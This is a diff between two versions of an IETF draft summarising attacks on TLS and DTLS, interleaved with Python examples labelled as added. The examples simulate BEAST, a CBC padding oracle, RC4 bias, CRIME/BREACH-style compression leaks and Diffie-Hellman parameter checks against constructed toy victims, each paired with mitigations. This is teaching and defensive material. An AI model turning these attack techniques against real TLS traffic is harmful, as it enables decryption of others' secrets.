draft-ietf-uta-tls-attacks-01.txt | draft-ietf-uta-tls-attacks-02.txt | |||
---|---|---|---|---|
uta Y. Sheffer | uta Y. Sheffer | |||
Internet-Draft Porticor | Internet-Draft Porticor | |||
Intended status: Informational R. Holz | Intended status: Informational R. Holz | |||
Expires: December 26, 2014 TUM | Expires: February 13, 2015 TUM | |||
P. Saint-Andre | P. Saint-Andre | |||
&yet | &yet | |||
June 24, 2014 | August 12, 2014 | |||
Summarizing Current Attacks on TLS and DTLS | Summarizing Current Attacks on TLS and DTLS | |||
draft-ietf-uta-tls-attacks-01 | draft-ietf-uta-tls-attacks-02 | |||
Abstract | Abstract | |||
Over the last few years there have been several serious attacks on | Over the last few years there have been several serious attacks on | |||
TLS, including attacks on its most commonly used ciphers and modes of | TLS, including attacks on its most commonly used ciphers and modes of | |||
operation. This document summarizes these attacks, with the goal of | operation. This document summarizes these attacks, with the goal of | |||
motivating generic and protocol-specific recommendations on the usage | motivating generic and protocol-specific recommendations on the usage | |||
of TLS and DTLS. | of TLS and DTLS. | |||
Status of This Memo | Status of This Memo | |||
skipping to change at page 1, line 37 | skipping to change at page 1, line 37 | |||
Internet-Drafts are working documents of the Internet Engineering | Internet-Drafts are working documents of the Internet Engineering | |||
Task Force (IETF). Note that other groups may also distribute | Task Force (IETF). Note that other groups may also distribute | |||
working documents as Internet-Drafts. The list of current Internet- | working documents as Internet-Drafts. The list of current Internet- | |||
Drafts is at http://datatracker.ietf.org/drafts/current/. | Drafts is at http://datatracker.ietf.org/drafts/current/. | |||
Internet-Drafts are draft documents valid for a maximum of six months | Internet-Drafts are draft documents valid for a maximum of six months | |||
and may be updated, replaced, or obsoleted by other documents at any | and may be updated, replaced, or obsoleted by other documents at any | |||
time. It is inappropriate to use Internet-Drafts as reference | time. It is inappropriate to use Internet-Drafts as reference | |||
material or to cite them other than as "work in progress." | material or to cite them other than as "work in progress." | |||
This Internet-Draft will expire on December 26, 2014. | This Internet-Draft will expire on February 13, 2015. | |||
Copyright Notice | Copyright Notice | |||
Copyright (c) 2014 IETF Trust and the persons identified as the | Copyright (c) 2014 IETF Trust and the persons identified as the | |||
document authors. All rights reserved. | document authors. All rights reserved. | |||
This document is subject to BCP 78 and the IETF Trust's Legal | This document is subject to BCP 78 and the IETF Trust's Legal | |||
Provisions Relating to IETF Documents | Provisions Relating to IETF Documents | |||
(http://trustee.ietf.org/license-info) in effect on the date of | (http://trustee.ietf.org/license-info) in effect on the date of | |||
publication of this document. Please review these documents | publication of this document. Please review these documents | |||
skipping to change at page 2, line 18 | skipping to change at page 2, line 18 | |||
Table of Contents | Table of Contents | |||
1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . 2 | 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . 2 | |||
2. Attacks on TLS . . . . . . . . . . . . . . . . . . . . . . . 3 | 2. Attacks on TLS . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.1. SSL Stripping . . . . . . . . . . . . . . . . . . . . . . . 3 | 2.1. SSL Stripping . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.2. BEAST . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 | 2.2. BEAST . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.3. Lucky Thirteen . . . . . . . . . . . . . . . . . . . . . . 3 | 2.3. Lucky Thirteen . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.4. Attacks on RC4 . . . . . . . . . . . . . . . . . . . . . . 3 | 2.4. Attacks on RC4 . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.5. Compression Attacks: CRIME and BREACH . . . . . . . . . . . 4 | 2.5. Compression Attacks: CRIME and BREACH . . . . . . . . . . . 4 | |||
2.6. Certificate Attacks . . . . . . . . . . . . . . . . . . . . 4 | 2.6. Certificate Attacks . . . . . . . . . . . . . . . . . . . . 4 | |||
2.7. Diffe-Hellman Parameters . . . . . . . . . . . . . . . . . 4 | 2.7. Diffie-Hellman Parameters . . . . . . . . . . . . . . . . . 4 | |||
2.8. Denial of Service . . . . . . . . . . . . . . . . . . . . . 4 | 2.8. Renegotiation . . . . . . . . . . . . . . . . . . . . . . . 5 | |||
3. Security Considerations . . . . . . . . . . . . . . . . . . . 5 | 2.9. Triple Handshake . . . . . . . . . . . . . . . . . . . . . . 5 | |||
4. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 5 | 2.10. Denial of Service . . . . . . . . . . . . . . . . . . . . . 5 | |||
5. Acknowledgements . . . . . . . . . . . . . . . . . . . . . . 5 | 2.11. Implementation Issues . . . . . . . . . . . . . . . . . . . 5 | |||
6. References . . . . . . . . . . . . . . . . . . . . . . . . . 5 | 3. Applicability to DTLS . . . . . . . . . . . . . . . . . . . . 6 | |||
6.1. Normative References . . . . . . . . . . . . . . . . . . . 5 | 4. Security Considerations . . . . . . . . . . . . . . . . . . . 6 | |||
6.2. Informative References . . . . . . . . . . . . . . . . . . 5 | 5. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 6 | |||
Appendix A. Appendix: Change Log . . . . . . . . . . . . . . . . 7 | 6. Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . 6 | |||
A.1. draft-ietf-uta-tls-bcp-01 . . . . . . . . . . . . . . . . . 7 | 7. Informative References . . . . . . . . . . . . . . . . . . . 6 | |||
A.2. draft-ietf-uta-tls-bcp-00 . . . . . . . . . . . . . . . . . 7 | Appendix A. Appendix: Change Log . . . . . . . . . . . . . . . . 9 | |||
A.3. draft-sheffer-uta-tls-bcp-00 . . . . . . . . . . . . . . . 7 | A.1. draft-ietf-uta-tls-attacks-02 . . . . . . . . . . . . . . . 9 | |||
Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 8 | A.2. draft-ietf-uta-tls-attacks-01 . . . . . . . . . . . . . . . 9 | |||
A.3. draft-ietf-uta-tls-attacks-00 . . . . . . . . . . . . . . . 9 | ||||
Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 9 | ||||
1. Introduction | 1. Introduction | |||
Over the last few years there have been several major attacks on TLS | Over the last few years there have been several major attacks on TLS | |||
[RFC5246], including attacks on its most commonly used ciphers and | [RFC5246], including attacks on its most commonly used ciphers and | |||
modes of operation. Details are given in Section 2, but suffice it | modes of operation. Details are given in Section 2, but suffice it | |||
to say that both AES-CBC and RC4, which together make up most | to say that both AES-CBC and RC4, which together make up most | |||
current usage, have been seriously attacked in the context of TLS. | current usage, have been seriously attacked in the context of TLS. | |||
This situation motivated the creation of the UTA working group, which | This situation motivated the creation of the UTA working group, which | |||
is tasked with the creation of generic and protocol-specific | is tasked with the creation of generic and protocol-specific | |||
recommendation for the use of TLS and DTLS. | recommendations for the use of TLS and DTLS. | |||
"Attacks always get better; they never get worse" (ironically, this | "Attacks always get better; they never get worse" (ironically, this | |||
saying is attributed to the NSA). This list of attacks describes our | saying is attributed to the NSA). This list of attacks describes our | |||
knowledge as of this writing. It seems likely that new attacks will | knowledge as of this writing. It seems likely that new attacks will | |||
be invented in the future. | be invented in the future. | |||
For a more detailed discussion of the attacks listed here, the | For a more detailed discussion of the attacks listed here, the | |||
interested reader is referred to [Attacks-iSec]. | interested reader is referred to [Attacks-iSec]. | |||
2. Attacks on TLS | 2. Attacks on TLS | |||
skipping to change at page 3, line 18 | skipping to change at page 3, line 21 | |||
recommendations. This is not intended to be an extensive survey of | recommendations. This is not intended to be an extensive survey of | |||
TLS's security. | TLS's security. | |||
While there are widely deployed mitigations for some of the attacks | While there are widely deployed mitigations for some of the attacks | |||
listed below, we believe that their root causes necessitate a more | listed below, we believe that their root causes necessitate a more | |||
systemic solution. | systemic solution. | |||
2.1. SSL Stripping | 2.1. SSL Stripping | |||
Various attacks attempt to remove the use of SSL/TLS altogether, by | Various attacks attempt to remove the use of SSL/TLS altogether, by | |||
modifying HTTP traffic and HTML pages as they pass on the wire. | modifying unencrypted protocols that request the use of TLS, | |||
These attacks are known collectively as SSL Stripping, and were first | specifically modifying HTTP traffic and HTML pages as they pass on | |||
introduced by Moxie Marlinspike [SSL-Stripping]. In the context of | the wire. These attacks are known collectively as SSL Stripping, and | |||
Web traffic, these attacks are only effective if the client accesses | were first introduced by Moxie Marlinspike [SSL-Stripping]. In the | |||
a Web server using a mixture of HTTP and HTTPS. | context of Web traffic, these attacks are only effective if the | |||
client accesses a Web server using a mixture of HTTP and HTTPS. | ||||
2.2. BEAST | 2.2. BEAST | |||
The BEAST attack [BEAST] uses issues with the TLS 1.0 implementation | The BEAST attack [BEAST] uses issues with the TLS 1.0 implementation | |||
of CBC (that is, the predictable initialization vector) to decrypt | of CBC (that is, the predictable initialization vector) to decrypt | |||
parts of a packet, and specifically to decrypt HTTP cookies when HTTP | parts of a packet, and specifically to decrypt HTTP cookies when HTTP | |||
is run over TLS. | is run over TLS. | |||
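The chosen-boundary guess that BEAST builds on can be shown in a few dozen lines. The following is an added example, not text or code from the draft: a constructed TLS 1.0-style CBC record layer (the IV of record n+1 is the last ciphertext block of record n), a victim that sends an attacker-chosen path followed by a secret cookie, and an attacker who recovers the cookie one byte at a time by comparing ciphertext blocks. The block cipher is a keyed stand-in (truncated SHA-256) and the MAC is omitted; neither changes the attack, which depends only on CBC chaining. The `explicit_iv=True` mode models the TLS 1.1 fix of a fresh random IV per record, under which the same attacker recovers nothing.

```python
"""BEAST-style recovery of a secret from TLS 1.0 CBC records.

Added example, not from the draft.  In TLS 1.0 the IV of record n+1 is the last
ciphertext block of record n, which the attacker has already seen on the wire.
The block cipher is a constructed keyed stand-in (truncated SHA-256); only the
encryption direction is needed and the attack uses nothing but CBC chaining.
"""
import hashlib
import os

BLOCK = 16
SECRET = b"sid=4f3a9c1e0b7d2a6e1c93"        # constructed cookie value (24 bytes)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _enc(key: bytes, blk: bytes) -> bytes:
    """Stand-in for one AES block encryption: deterministic and keyed.  It is not
    invertible, which does not matter because the attacker only compares blocks."""
    return hashlib.sha256(key + blk).digest()[:BLOCK]


class CbcRecordLayer:
    """Victim's sender.  Zero-pads to the block size and omits the MAC; neither
    changes the attack.  explicit_iv=False is TLS 1.0 chaining, True is the
    TLS 1.1 fix of a fresh random IV per record."""

    def __init__(self, secret: bytes, explicit_iv: bool = False):
        self.key, self.secret, self.explicit_iv = os.urandom(16), secret, explicit_iv
        self.chain = os.urandom(BLOCK)                   # IV of the first record

    def _send(self, data: bytes):
        data += bytes(-len(data) % BLOCK)
        iv = os.urandom(BLOCK) if self.explicit_iv else self.chain
        blocks, prev = [], iv
        for i in range(0, len(data), BLOCK):
            prev = _enc(self.key, _xor(data[i:i + BLOCK], prev))
            blocks.append(prev)
        self.chain = prev                                # TLS 1.0: next record's IV
        return iv, blocks                                # both visible on the wire

    def request(self, path: bytes):
        """Browser request: attacker-chosen path, then the secret cookie."""
        return self._send(path + self.secret)

    def raw(self, data: bytes):
        """Attacker-controlled plaintext on the same connection (in the original
        attack this came from a browser component the attacker's page drives)."""
        return self._send(data)


def beast_recover(victim: CbcRecordLayer, secret_len: int) -> bytes:
    known = b""
    for i in range(secret_len):
        # Pick the path length so that secret[i] is the last byte of block b and
        # the 15 bytes before it are already known to the attacker.
        prefix = b"A" * (15 - i % BLOCK)
        iv, blocks = victim.request(prefix)
        b = i // BLOCK
        prev = iv if b == 0 else blocks[b - 1]           # block XORed into the target
        target = blocks[b]
        known15 = (prefix + known)[BLOCK * b:BLOCK * b + 15]
        chain = blocks[-1]                               # predicted IV of the next record
        for g in range(256):
            guess = known15 + bytes([g])
            # Victim computes E(P' ^ chain) = E(prev ^ guess), which equals the
            # target block exactly when guess == P_b.
            _, out = victim.raw(_xor(_xor(prev, chain), guess))
            chain = out[-1]
            if out[0] == target:
                known += bytes([g])
                break
        else:
            return known    # no guess matched: the IV was not predictable (TLS 1.1+)
    return known


if __name__ == "__main__":
    print("TLS 1.0 chaining:", beast_recover(CbcRecordLayer(SECRET), len(SECRET)))
    print("TLS 1.1 random IV:", beast_recover(CbcRecordLayer(SECRET, explicit_iv=True), len(SECRET)))
```

Each guess costs the attacker one record, so a 24-byte cookie takes at most 24 x 256 records; the browser-side 1/n-1 record splitting that shipped as the deployed mitigation works by denying the attacker control over a whole first block, while TLS 1.1's explicit IV removes the predictability itself.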
2.3. Lucky Thirteen | 2.3. Lucky Thirteen | |||
A consequence of the MAC-then-encrypt design in all current versions | A consequence of the MAC-then-encrypt design in all current versions | |||
of TLS is the existence of padding oracle attacks [Padding-Oracle]. | of TLS is the existence of padding oracle attacks [Padding-Oracle]. | |||
A recent incarnation of these attacks is the Lucky Thirteen attack | A recent incarnation of these attacks is the Lucky Thirteen attack | |||
[CBC-Attack], a timing side-channel attack that allows the attacker | [CBC-Attack], a timing side-channel attack that allows the attacker | |||
to decrypt arbitrary ciphertext. | to decrypt arbitrary ciphertext. | |||
The Lucky Thirteen attack can be mitigated by using authenticated | ||||
encryption like AES-GCM [RFC5288] and encrypt-then-mac | ||||
[I-D.ietf-tls-encrypt-then-mac] instead of the TLS default of MAC- | ||||
then-encrypt. | ||||
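The padding oracle that MAC-then-encrypt exposes, and the reason encrypt-then-MAC closes it, are easier to see in code than in prose. The following is an added example, not code from the draft. It uses a constructed 4-round Feistel network as a stand-in for AES (invertible and deterministic but not secure; the attack depends only on the CBC and padding structure), TLS-style padding, and HMAC-SHA256. The timing side channel is modelled as the number of hash blocks the receiver processes before answering, which is the quantity Lucky Thirteen measures remotely. The attacker recovers one plaintext byte with 256 forged records against the MAC-then-encrypt receiver and gets no signal at all from the encrypt-then-MAC one.

```python
"""CBC padding oracle in MAC-then-encrypt, and why encrypt-then-MAC removes it.

Added example, not from the draft.  The block cipher is a constructed 4-round
Feistel stand-in for AES (invertible, deterministic, not secure); the attack
depends only on the CBC and padding structure.  The timing side channel is
modelled as the number of hash blocks the receiver processes before answering.
"""
import hashlib
import hmac
import os

BLOCK = 16
MSG = b"GET /private HTTP/1.0\r\nCookie: sid=Kx7"   # constructed record plaintext


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, i):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def enc_block(key, blk):                      # stand-in for AES block encryption
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def dec_block(key, blk):                      # inverse of enc_block
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = enc_block(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    blocks = [iv] + [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return b"".join(_xor(dec_block(key, c), p) for p, c in zip(blocks, blocks[1:]))


def tls_pad(data):
    """TLS CBC padding: n+1 bytes, each equal to n, up to the next block boundary."""
    n = BLOCK - 1 - len(data) % BLOCK
    return data + bytes([n]) * (n + 1)


def padding_ok(pt):
    n = pt[-1]
    return n + 1 <= len(pt) and pt[-(n + 1):] == bytes([n]) * (n + 1)


def hash_blocks(n_bytes):                     # SHA-256 compression calls: timing proxy
    return (n_bytes + 9 + 63) // 64


class MacThenEncrypt:
    """TLS default.  On bad padding the receiver stops before computing the MAC,
    so its response time tells the sender whether the padding decrypted correctly."""
    def __init__(self):
        self.ek, self.mk, self.iv = os.urandom(16), os.urandom(16), os.urandom(16)

    def seal(self, msg):
        tag = hmac.new(self.mk, msg, hashlib.sha256).digest()
        return cbc_encrypt(self.ek, self.iv, tls_pad(msg + tag))

    def open(self, ct):
        """Returns (plaintext or None, work done)."""
        pt = cbc_decrypt(self.ek, self.iv, ct)
        if not padding_ok(pt):
            return None, 0
        body = pt[:-(pt[-1] + 1)]
        msg, tag = body[:-32], body[-32:]
        ok = hmac.compare_digest(hmac.new(self.mk, msg, hashlib.sha256).digest(), tag)
        return (msg if ok else None), hash_blocks(len(msg))


class EncryptThenMac(MacThenEncrypt):
    """Mitigation named in the draft: MAC the ciphertext, verify it first in
    constant time, and never inspect the padding of a forged record."""
    def seal(self, msg):
        ct = cbc_encrypt(self.ek, self.iv, tls_pad(msg))
        return ct + hmac.new(self.mk, ct, hashlib.sha256).digest()

    def open(self, ct):
        body, tag = ct[:-32], ct[-32:]
        work = hash_blocks(len(body))
        if not hmac.compare_digest(hmac.new(self.mk, body, hashlib.sha256).digest(), tag):
            return None, work
        pt = cbc_decrypt(self.ek, self.iv, body)
        return (pt[:-(pt[-1] + 1)] if padding_ok(pt) else None), work


def recover_last_byte(receiver, ct, idx):
    """Recover plaintext byte 16*idx+15 (idx >= 1) from the timing of 256 forgeries
    built as (tampered C[idx-1], C[idx]).  Returns None when there is no signal."""
    prev, target = ct[(idx - 1) * BLOCK:idx * BLOCK], ct[idx * BLOCK:(idx + 1) * BLOCK]
    work = {g: receiver.open(prev[:15] + bytes([prev[15] ^ g]) + target)[1] for g in range(256)}
    baseline = min(work.values())
    for g in (g for g, w in work.items() if w != baseline):
        # Padding looked valid.  Flip byte 14 as well: only a length-0 pad (last byte
        # 0x00) survives that, ruling out the 1/256 fluke of an 0x01 0x01 pad.
        tampered = prev[:14] + bytes([prev[14] ^ 0xFF, prev[15] ^ g])
        if receiver.open(tampered + target)[1] != baseline:
            return g          # decrypted last byte was 0x00, so P[idx][15] == g
    return None
```

Recovering the remaining bytes of a block follows the usual Vaudenay iteration (force a pad of 0x01 0x01, then 0x02 0x02 0x02, and so on). Real implementations that MAC a dummy message on bad padding narrow the gap but, as Lucky Thirteen showed, do not close it; AES-GCM or encrypt-then-MAC removes the oracle rather than hiding it.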
2.4. Attacks on RC4 | 2.4. Attacks on RC4 | |||
The RC4 algorithm [RC4] has been used with TLS (and previously, SSL) | The RC4 algorithm [RC4] has been used with TLS (and previously, SSL) | |||
for many years. RC4 has long been known to have a variety of | for many years. RC4 has long been known to have a variety of | |||
cryptographic weaknesses, e.g. [RC4-Attack-Pau], [RC4-Attack-Man], | cryptographic weaknesses, e.g. [RC4-Attack-Pau], [RC4-Attack-Man], | |||
[RC4-Attack-FMS]. Recent cryptanalysis results [RC4-Attack-AlF] | [RC4-Attack-FMS]. Recent cryptanalysis results [RC4-Attack-AlF] | |||
exploit biases in the RC4 keystream to recover repeatedly encrypted | exploit biases in the RC4 keystream to recover repeatedly encrypted | |||
plaintexts. | plaintexts. | |||
These recent results are on the verge of becoming practically | These recent results are on the verge of becoming practically | |||
exploitable; currently they require 2^26 sessions or 13x2^30 | exploitable; currently they require 2^26 sessions or 13x2^30 | |||
encryptions. As a result, RC4 can no longer be seen as providing a | encryptions. As a result, RC4 can no longer be seen as providing a | |||
sufficient level of security for TLS sessions. | sufficient level of security for TLS sessions. For further details, | |||
 | the reader is referred to [I-D.ietf-tls-prohibiting-rc4]. | |||
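The keystream bias behind the broadcast attack is easy to measure. The following is an added example, not code from the draft: a pure-Python RC4 and an experiment that encrypts the same two-byte plaintext under many random keys, exhibiting the best-known single-byte bias (the second keystream byte is 0 with probability close to 2/256 rather than 1/256, from [RC4-Attack-Man]) and recovering the plaintext byte from the most frequent ciphertext value, which is the shape of the attack in [RC4-Attack-AlF]. The plaintext and the session count are constructed for the demonstration.

```python
"""RC4 keystream bias, measured.  Added example, not from the draft.

TLS sends the same plaintext bytes (e.g. a cookie) at the same positions under
a fresh key each session.  Because Z_2 is 0 about twice as often as any other
value, the 2nd ciphertext byte seen most often across many sessions is the 2nd
plaintext byte itself.
"""
import random
from collections import Counter

PLAINTEXT = b"\x00S"          # constructed: only the 2nd byte is attacked here


def rc4_keystream(key: bytes, n: int) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                           # key scheduling (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                             # keystream generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def bias_experiment(sessions: int = 20000, seed: int = 2014):
    """Encrypt PLAINTEXT under `sessions` random 128-bit keys.  Returns the observed
    Pr[Z_2 == 0] and the attacker's guess for the 2nd plaintext byte: the most
    frequent 2nd ciphertext byte, since C_2 = P_2 XOR Z_2 and Z_2 is most often 0."""
    rng = random.Random(seed)
    zeros, second_bytes = 0, Counter()
    for _ in range(sessions):
        key = bytes(rng.getrandbits(8) for _ in range(16))
        ks = rc4_keystream(key, len(PLAINTEXT))
        zeros += ks[1] == 0
        second_bytes[PLAINTEXT[1] ^ ks[1]] += 1
    guess = second_bytes.most_common(1)[0][0]
    return zeros / sessions, guess


if __name__ == "__main__":
    rate, guess = bias_experiment()
    print(f"Pr[Z_2 = 0] = {rate:.5f} (uniform would be {1/256:.5f}); guessed byte {guess!r}")
```

Twenty thousand sessions are enough here because this is the strongest of the biases; the 2^26 to 2^30 figures in the text come from having to use the much weaker biases at later keystream positions, where a cookie actually sits.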
2.5. Compression Attacks: CRIME and BREACH | 2.5. Compression Attacks: CRIME and BREACH | |||
The CRIME attack [CRIME] allows an active attacker to decrypt | The CRIME attack [CRIME] allows an active attacker to decrypt | |||
ciphertext (specifically, cookies) when TLS is used with protocol- | ciphertext (specifically, cookies) when TLS is used with TLS-level | |||
level compression. | compression. | |||
The TIME attack [TIME] and the later BREACH attack [BREACH] both make | The TIME attack [TIME] and the later BREACH attack [BREACH] both make | |||
similar use of HTTP-level compression to decrypt secret data passed | similar use of HTTP-level compression to decrypt secret data passed | |||
in the HTTP response. We note that compression of the HTTP message | in the HTTP response. We note that compression of the HTTP message | |||
body is much more prevalent than compression at the TLS level. | body is much more prevalent than compression at the TLS level. | |||
The former attack can be mitigated by disabling TLS compression, as | The former attack can be mitigated by disabling TLS compression. We | |||
recommended below. We are not aware of mitigations at the protocol | are not aware of mitigations at the TLS protocol level to the latter | |||
level to the latter attack, and so application-level mitigations are | attack, and so application-level mitigations are needed (see | |||
needed (see [BREACH]). For example, implementations of HTTP that use | [BREACH]). For example, implementations of HTTP that use CSRF tokens | |||
CSRF tokens will need to randomize them even when the recommendations | will need to randomize them even when the recommendations of | |||
of [I-D.ietf-uta-tls-bcp] are adopted. | [I-D.ietf-uta-tls-bcp] are adopted. | |||
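The compression oracle is the same whether the compression happens at the TLS layer (CRIME) or in the HTTP body (BREACH); only the vantage point changes. The following is an added example, not code from the draft. A constructed page carries a CSRF token and reflects the attacker's query, the attacker observes only the compressed (zlib/DEFLATE) response length, and recovers the token one character at a time. Because a single-byte guess saves only a few bits, each guess is measured under eight paddings of 9-bit literals so that the summed byte lengths track the exact bit length (a padding trick in the spirit of those in [BREACH]). The `mitigated_server` shows the draft's suggested countermeasure of randomizing the token on every response, against which the same attacker recovers garbage.

```python
"""Compression side channel of the CRIME/BREACH kind, and token masking.

Added example, not from the draft.  Page, token and server are constructed.
Only the compressed length of each response is observed, as a network
attacker would.
"""
import os
import zlib

TOKEN_LEN = 16
ALPHABET = b"0123456789abcdef"
TOKEN = b"9c4e1f07ab23d658"          # constructed secret


def compressed_len(body: bytes) -> int:
    # Fixed Huffman tables keep literal costs uniform; real servers mostly use
    # dynamic tables, which add noise but not a different kind of leak.
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def render_page(token_field: bytes, reflected: bytes) -> bytes:
    """Constructed vulnerable page: secret and attacker input in one response."""
    return (b"<html><body><p>Welcome back.</p>"
            b'<form method="post"><input type="hidden" name="csrf" value="'
            + token_field + b'"><input type="submit"></form>'
            b"<p>No results for: " + reflected + b"</p></body></html>")


def vulnerable_server(token: bytes):
    return lambda query: render_page(token, query)


def mitigated_server(token: bytes):
    """Per-response token masking: send pad || (pad XOR token) with a fresh pad
    each time.  The server unmasks on receipt; the page never repeats a string
    for the attacker's guess to match."""
    def handle(query):
        pad = os.urandom(len(token))
        masked = bytes(a ^ b for a, b in zip(pad, token))
        return render_page(pad.hex().encode() + masked.hex().encode(), query)
    return handle


def oracle(server, query: bytes) -> int:
    # Bytes >= 0x90 never occur in the ASCII page, so each padding byte is one
    # 9-bit literal; eight paddings visit every bit alignment once and the sum
    # of the eight byte lengths moves exactly with the bit length.
    return sum(compressed_len(server(query + bytes(range(0x90, 0x90 + i))))
               for i in range(8))


def recover_token(server) -> bytes:
    """Extend the known prefix by the character whose reflection compresses best."""
    known = b""
    for _ in range(TOKEN_LEN):
        cost = {c: oracle(server, b'name="csrf" value="' + known + bytes([c]))
                for c in ALPHABET}
        known += bytes([min(cost, key=cost.get)])
    return known


if __name__ == "__main__":
    print("vulnerable:", recover_token(vulnerable_server(TOKEN)) == TOKEN)
    print("masked    :", recover_token(mitigated_server(TOKEN)) == TOKEN)
```

Disabling TLS compression removes the CRIME variant; for BREACH the secret and the reflection must be kept out of the same compression context, or the secret must change on every response as above, which is why CSRF tokens need per-request randomization even under the BCP's TLS settings.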
2.6. Certificate Attacks | 2.6. Certificate Attacks | |||
There have been several practical attacks on TLS when used with RSA | There have been several practical attacks on TLS when used with RSA | |||
certificates (the most common use case). These include | certificates (the most common use case). These include | |||
[Bleichenbacher98] and [Klima03]. While the Bleichenbacher attack | [Bleichenbacher98] and [Klima03]. While the Bleichenbacher attack | |||
has been mitigated in TLS 1.0, the Klima attack that relies on a | has been mitigated in TLS 1.0, the Klima attack that relies on a | |||
version-check oracle is only mitigated by TLS 1.1. | version-check oracle is only mitigated by TLS 1.1. | |||
The use of RSA certificates often involves exploitable timing issues | The use of RSA certificates often involves exploitable timing issues | |||
[Brumley03], unless the implementation takes care to explicitly | [Brumley03], unless the implementation takes care to explicitly | |||
eliminate them. | eliminate them. | |||
2.7. Diffe-Hellman Parameters | 2.7. Diffie-Hellman Parameters | |||
TLS allows ephemeral Diffie-Hellman and Elliptic Curve | TLS allows ephemeral Diffie-Hellman and Elliptic Curve | |||
Diffie-Hellman parameters to be defined in its respective key | Diffie-Hellman parameters to be defined in its respective key | |||
exchange modes. This results in an attack that remains | exchange modes. This results in an attack that remains | |||
unresolved, detailed in [Cross-Protocol]. In | unresolved, detailed in [Cross-Protocol]. In | |||
addition, clients that do not properly verify the received parameters | addition, clients that do not properly verify the received parameters | |||
are exposed to MITM attacks. Unfortunately the TLS protocol does not | are exposed to man in the middle (MITM) attacks. Unfortunately the | |||
require this verification, see [RFC6989] for the IPsec analogy. | TLS protocol does not require this verification, see [RFC6989] for | |||
the IPsec analogy. | ||||
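The parameter checks that TLS leaves optional are the ones RFC 6989 makes mandatory for IKEv2. The following is an added example, not code from the draft: a `validate_dh` function applying those tests to a TLS-shaped ServerKeyExchange (p, g, Ys), and a demonstration of what an unchecked value lets a man in the middle do. A toy 128-bit safe prime is generated so the example runs offline; the names, the size and the scenario are constructed, and `min_bits` defaults to the 2048 bits a real client should insist on.

```python
"""Checking received Diffie-Hellman parameters.  Added example, not from the draft.

Applies the RFC 6989 tests to a TLS-shaped ServerKeyExchange (p, g, Ys): p must
be a probable prime of adequate size, g and Ys must lie strictly between 1 and
p-1, and both must lie in the prime-order subgroup (x^q mod p == 1).
"""
import random


def is_probable_prime(n: int, rounds: int = 32, rng=random.Random(1)) -> bool:
    """Miller-Rabin after trial division by small primes."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def safe_prime(bits: int, rng: random.Random):
    """Returns (p, q) with p = 2q + 1 and both prime (toy sizes only)."""
    while True:
        q = rng.getrandbits(bits - 1) | (1 << (bits - 2)) | 1
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            return 2 * q + 1, q


def validate_dh(p: int, g: int, ys: int, q: int = None, min_bits: int = 2048):
    """None if (p, g, Ys) pass, otherwise the reason the client must abort."""
    if p.bit_length() < min_bits:
        return "p too small"
    if not is_probable_prime(p):
        return "p is not prime"
    if q is None:
        q = (p - 1) // 2                       # TLS sends no q; assume a safe prime
        if not is_probable_prime(q):
            return "p is not a safe prime and no q is known"
    if not 1 < g < p - 1:
        return "g out of range"
    if pow(g, q, p) != 1:
        return "g not in the order-q subgroup"
    if not 1 < ys < p - 1:
        return "Ys out of range"
    if pow(ys, q, p) != 1:
        return "Ys not in the order-q subgroup"
    return None


def demo(bits: int = 128, seed: int = 2014) -> dict:
    rng = random.Random(seed)
    p, q = safe_prime(bits, rng)
    g = pow(rng.randrange(2, p - 1), 2, p)           # a square mod p, hence of order q
    x, y = rng.randrange(2, q), rng.randrange(2, q)  # server's and client's exponents
    ys = pow(g, x, p)
    return {
        "honest": validate_dh(p, g, ys, min_bits=bits),
        # A MITM who rewrites ServerKeyExchange to Ys = 1 pins the client's premaster
        # secret Ys^y to 1 for every y; the attacker knows it without any key.
        "ys_one": validate_dh(p, g, 1, min_bits=bits),
        "forced_secret": pow(1, y, p),
        # p - 1 has order 2, so (p-1)^y is +-1 and leaks the parity of y.
        "ys_p_minus_1": validate_dh(p, g, p - 1, min_bits=bits),
        # -g is a non-residue: it generates the whole group, not the q-subgroup.
        "g_outside_subgroup": validate_dh(p, p - g, ys, min_bits=bits),
        "composite_p": validate_dh(3 * p, g, ys, min_bits=bits),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20s} {result}")
```

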